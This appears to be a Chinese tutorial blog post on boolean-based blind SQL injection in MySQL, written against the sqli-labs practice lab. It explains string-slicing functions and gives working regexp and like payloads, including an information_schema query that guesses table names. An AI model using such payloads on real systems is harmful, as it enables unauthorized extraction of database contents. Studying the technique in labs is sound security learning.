构造逻辑判断
常用字符串截取函数http://www.cnblogs.com/yyccww/p/6054569.html
常用函数
left(a,b)  从左侧截取a的前b位
right(a,b)  从右侧截取a的前b位
substr(a,b,c)  从b位置,将字符串a截取c的长度
mid(a,b,c)   从b位置,将字符串a截取c的长度
ascii()  将字符转换为ascii
ord()同ascii()一样

repexp正则注入
用法select user() regexp '^[a-z]'
第二位可以用select user() regexp '^ro'
当正确的时候显示结果为1,不正确的是时候结果为0
select * from users where id=1 and 1=(if((user() regexp '^r'),1,0))
select * from users where id=1 and 1=(user() regexp '^r')
^是从开头进行匹配,$是从结尾开始匹配

详细信息http://www.cnblogs.com/yyccww/p/6054579.html

通过if语句的条件判断,返回一些条件句,比如if构造一个判断.根据返回结果是否等于0或者等于1进行判断
select * from users where id=1
and 1=(select 1 from
information_schema.tables
where table_schema='secrity' and
table_name regexp '^us[a-z]' limit 0,1)

like匹配注入
和上述的正则类似,mysql在匹配的时候我们可以用like进行匹配

用法 select user() like 'ro%'
http://127.0.0.1/sqli/Less-5/?id=1'  and user() like 'eo%'--+

最新文章

1. Spring cookie 实战
2. 通过接口实现JAVA和.NET互调用-JNInterface
3. SpringMVC操作指南-整合Spring、SpringMVC、MyBatis、Log4j/Log4j2及JUnit4搭建项目框架
4. Day 6
5. Ubuntu 下安装 MySQL Workbench
6. [20130704] Intra-Query Parallel Thread Deadlocks
7. jQuery 中 attr() 和 prop() 方法的区别
8. linux下定时任务的使用
9. Java笔记(八)……数组
10. DISC免费性格测试题
11. Java-工厂设计模式
12. 根据子级ID获取其所有父级
13. OD: Big_Endian vs Little_Endian
14. Windows Server 2003 安装Sql Server 2005 问题处理
15. Maven+Spring
16. MongDB PHP7
17. iOS开发之一：入门介绍
18. TypeError: unsupported operand type(s) for +: 'float' and 'decimal.Decimal'
19. BZOJ4300:绝世好题(DP)
20. 三次握手---TCP/IP

热门文章

1. Linux内核原子（1） - spinlock的实现
2. java List 排序
3. js中转移符
4. uva 10271 (dp)
5. c#判断IP是否可以Ping通
6. C宏展开的几个注意事项
7. SQL Server中的日期格式化
8. iOS开发_数据存储方式
9. Android中dp,px,sp概念梳理以及如何做到屏幕适配
10. js中，全局变量与直接添加在window属性的区别